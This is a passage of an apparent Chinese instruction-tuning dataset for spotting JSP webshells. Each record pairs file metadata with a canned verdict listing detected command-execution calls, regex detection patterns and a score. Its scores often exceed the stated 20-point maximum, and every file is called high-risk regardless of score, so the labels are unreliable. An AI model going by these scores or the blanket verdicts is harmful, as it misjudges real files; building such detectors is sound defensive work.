"分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31243 bytes\", \"行数\": 1012}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/shell1.jsp", "malicious_score": 37, "md5_hash": "535abcf17ef7f0584ba6a7dcf2028008"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"56060 bytes\", \"行数\": 1780}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ma4.jsp", "malicious_score": 175, "md5_hash": "eebc60a70e1823f2aa519a57fb8992c7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"he1p.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85028 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/he1p.jsp", "malicious_score": 324, "md5_hash": "11b307d5a543cc2df560f6dceb44ce4d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"no.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30189 bytes\", \"行数\": 995}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/no.jsp", "malicious_score": 37, "md5_hash": "08f3b1efbec31fcc861efac30aaafaff"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85024 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JspSpy.jsp", "malicious_score": 324, "md5_hash": "d71716df5042880ef84427acee8b121e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"myxx.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"142414 bytes\", \"行数\": 4201}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 459/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/myxx.jsp", "malicious_score": 459, "md5_hash": "e0354099bee243702eb11df8d0e046df"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ok.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85066 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ok.jsp", "malicious_score": 324, "md5_hash": "32dea47d9c13f9000c4c807561341bee"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"data.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30066 bytes\", \"行数\": 993}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/data.jsp", "malicious_score": 37, "md5_hash": "facf92e0f359924e5ffa047cec2aa4f3"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ProcessBuilder-cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1118 bytes\", \"行数\": 41}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ProcessBuilder( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ProcessBuilder-cmd.jsp", "malicious_score": 9, "md5_hash": "5d7af0aae98a911f8049964affbdfd46"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"123.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2063 bytes\", \"行数\": 48}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/123.jsp", "malicious_score": 9, "md5_hash": "c691f53e849676cac68a38d692467641"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84517 bytes\", \"行数\": 2328}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/a.jsp", "malicious_score": 315, "md5_hash": "76037ebd781ad0eac363d56fc81f4b4f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"72308 bytes\", \"行数\": 1913}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ma.jsp", "malicious_score": 184, "md5_hash": "4cc68fa572e88b669bce606c7ace0ae9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zval.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6216 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/zval.jsp", "malicious_score": 23, "md5_hash": "e01d827a17f6f70a148dc01569c94c15"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"824 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/1.jsp", "malicious_score": 15, "md5_hash": "c500cdc7ba1c9a3e26a5eab265ad48e1"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JSP菜刀一句话木马.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6218 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JSP菜刀一句话木马.jsp", "malicious_score": 23, "md5_hash": "495f1a0a4c82f986f4bdf51ae1898ee7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Silic.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"700 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/Silic.jsp", "malicious_score": 9, "md5_hash": "d0e05f9c9b8e0b3fa11f57d9ab800380"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86575 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JspSpyJDK5.jsp", "malicious_score": 316, "md5_hash": "341298482cf90febebb8616426080d1d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sys3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1315 bytes\", \"行数\": 43}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/sys3.jsp", "malicious_score": 9, "md5_hash": "b3028a854d07674f4d8a9cf2fb6137ec"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"web02.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"641 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 包含网络功能: HttpURLConnection 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/web02.jsp", "malicious_score": 10, "md5_hash": "4bc11e28f5dccd0c45a37f2b541b2e98"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xia.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84410 bytes\", \"行数\": 2317}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/xia.jsp", "malicious_score": 315, "md5_hash": "02dd2ded35de8d51dc0fe3d3bab38898"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"utils.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7675 bytes\", \"行数\": 297}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/utils.jsp", "malicious_score": 26, "md5_hash": "9827ba2e8329075358b8e8a53e20d545"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"index_bak1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6232 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/index_bak1.jsp", "malicious_score": 23, "md5_hash": "1acf96388a960e9445246f41d9cd205f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp_File_browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73484 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jsp_File_browser.jsp", "malicious_score": 184, "md5_hash": "7fbf36b57978d56de5541ea090d6a213"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spjspshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"18473 bytes\", \"行数\": 814}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 34/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/spjspshell.jsp", "malicious_score": 34, "md5_hash": "7ab8dac087317a99e1be1234bc585ce8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"customize.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7663 bytes\", \"行数\": 297}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/customize.jsp", "malicious_score": 26, "md5_hash": "d55578eccad090f30f5d735b8ec530b1"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"32024 bytes\", \"行数\": 807}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 112/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ma2.jsp", "malicious_score": 112, "md5_hash": "e94e8a70845ae6fac92209fc3099beb9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"m.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86649 bytes\", \"行数\": 2409}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/m.jsp", "malicious_score": 316, "md5_hash": "4246f9a7e69660ffeb4e0de276e80a6c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"12302.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2079 bytes\", \"行数\": 47}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/12302.jsp", "malicious_score": 9, "md5_hash": "81bdf7f6cb8339babc4725fb36da5d0f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hsxa1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"701 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hsxa1.jsp", "malicious_score": 9, "md5_hash": "5686d5a38c6f5b8c55095af95c2b0244"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"404.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30026 bytes\", \"行数\": 993}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/404.jsp", "malicious_score": 37, "md5_hash": "046da5ee6a91ec7fef707a8c081e6327"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-09-03-02.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"533 bytes\", \"行数\": 16}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, ProcessBuilder( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/2022-09-03-02.jsp", "malicious_score": 9, "md5_hash": "75fe62b0d2a0ca1375bef8d81b5ffa32"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"leo.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"27766 bytes\", \"行数\": 844}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/leo.jsp", "malicious_score": 37, "md5_hash": "d8317bf0239a65c4f8055f9e066fdae5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"t.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6216 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/t.jsp", "malicious_score": 23, "md5_hash": "09caf76c07d0ee92ad3c27e10bf93a31"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"inback3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"170 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/inback3.jsp", "malicious_score": 9, "md5_hash": "ea5612492780a26b8aa7e5cedd9b8f4e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"guige.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2526 bytes\", \"行数\": 41}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/guige.jsp", "malicious_score": 6, "md5_hash": "4c2a2ca1534771419d296c91ed119e0b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zx.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"174 bytes\", \"行数\": 3}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/zx.jsp", "malicious_score": 9, "md5_hash": "67627c264db1e54a4720bd6a64721674"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"queryDong.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120642 bytes\", \"行数\": 3312}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/queryDong.jsp", "malicious_score": 465, "md5_hash": "90a5ba0c94199269ba33a58bc6a4ad99"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"400.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"37380 bytes\", \"行数\": 1115}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 61/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/400.jsp", "malicious_score": 61, "md5_hash": "290d77c6751e39b3cf28f9a254e55239"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"33612 bytes\", \"行数\": 799}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 恶意度评分: 117/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/list1.jsp", "malicious_score": 117, "md5_hash": "8d9e5afa77303c9c01ff34ea4e7f6ca6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK51.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84513 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JspSpyJDK51.jsp", "malicious_score": 315, "md5_hash": "29aebe333d6332f0ebc2258def94d57e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"k8cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2105 bytes\", \"行数\": 70}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/k8cmd.jsp", "malicious_score": 12, "md5_hash": "cc118049597655fa02b5e58ec69516d8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Runtime-reflect-cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1443 bytes\", \"行数\": 43}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/Runtime-reflect-cmd.jsp", "malicious_score": 6, "md5_hash": "5cd97161078a17ebde4e4e390515d341"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"201.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/201.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"asd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1337 bytes\", \"行数\": 47}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/asd.jsp", "malicious_score": 9, "md5_hash": "e96ecff0b37e186b9bba5566be5ab4f2"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pb.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"464 bytes\", \"行数\": 3}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/pb.jsp", "malicious_score": 9, "md5_hash": "2681350be6e33e516fab829834f408f8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"edit_ot.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, 